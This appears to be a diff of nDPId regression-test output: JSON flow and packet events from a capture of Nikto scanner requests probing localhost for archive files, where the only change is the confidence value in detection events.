00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277162,"pkt":"AAAAAAAAAAAAAAAACABFAAC9DilAAEAGLhB\/AAABfwAAAcPoH5AB6DautSQRQ4AYAED+sQAAAQEICp1m\/NKdZvzRR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277162,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277164,"pkt":"AAAAAAAAAAAAAAAACABFAADFIABAAEAGHDF\/AAABfwAAAcPqH5Cuoid2XcqpP4AYAED+uQAAAQEICp1m\/NSdZvzTR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":305,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277164,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 